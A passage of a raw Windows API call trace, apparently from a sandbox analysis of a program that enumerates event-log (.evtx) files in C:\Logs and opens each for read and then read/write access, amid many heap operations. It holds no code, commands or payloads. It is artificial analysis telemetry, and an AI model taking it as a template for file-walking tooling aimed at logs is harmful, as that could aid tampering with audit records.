(HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0072.126] AreFileApisANSI () returned 1 [0072.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx", lpUsedDefaultChar=0x0) returned 42 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0072.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.126] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.127] AreFileApisANSI () returned 1 [0072.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0072.127] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67900 [0072.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=42 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 42 [0072.127] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.127] GetFileType (hFile=0x410) returned 0x1 [0072.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0072.127] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.127] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.127] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.128] CloseHandle (hObject=0x410) returned 1 [0072.128] AreFileApisANSI () returned 1 [0072.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0072.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67540 [0072.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=42 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 42 [0072.128] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.128] GetFileType (hFile=0x410) returned 0x1 [0072.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0072.128] CloseHandle (hObject=0x410) returned 1 [0072.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0072.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0072.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0072.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0072.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0072.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0072.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0072.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0072.129] AreFileApisANSI () returned 1 [0072.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x54) returned 0x67540 [0072.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=42 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 42 [0072.129] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93d06f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93d06f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0072.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.129] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-MUI%4Operational.evtx", cAlternateFileName="MI6F01~1.EVT")) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0072.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0072.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.130] AreFileApisANSI () returned 1 [0072.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx", lpUsedDefaultChar=0x0) returned 48 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0072.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.130] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.130] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0072.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.131] AreFileApisANSI () returned 1 [0072.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0072.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0072.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 48 [0072.131] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.131] GetFileType (hFile=0x410) returned 0x1 [0072.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0072.131] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.131] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.131] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.132] CloseHandle (hObject=0x410) returned 1 [0072.132] AreFileApisANSI () returned 1 [0072.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0072.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 48 [0072.132] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.132] GetFileType (hFile=0x410) returned 0x1 [0072.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.132] CloseHandle (hObject=0x410) returned 1 [0072.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0072.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0072.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0072.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0072.295] AreFileApisANSI () returned 1 [0072.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0072.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=48 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx") returned 48 [0072.296] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc93aa49b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc93aa49b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0072.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.296] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.296] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9d33b19, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9d33b19, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-NCSI%4Operational.evtx", cAlternateFileName="MI483C~1.EVT")) returned 1 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0072.296] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0072.296] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0072.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0072.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 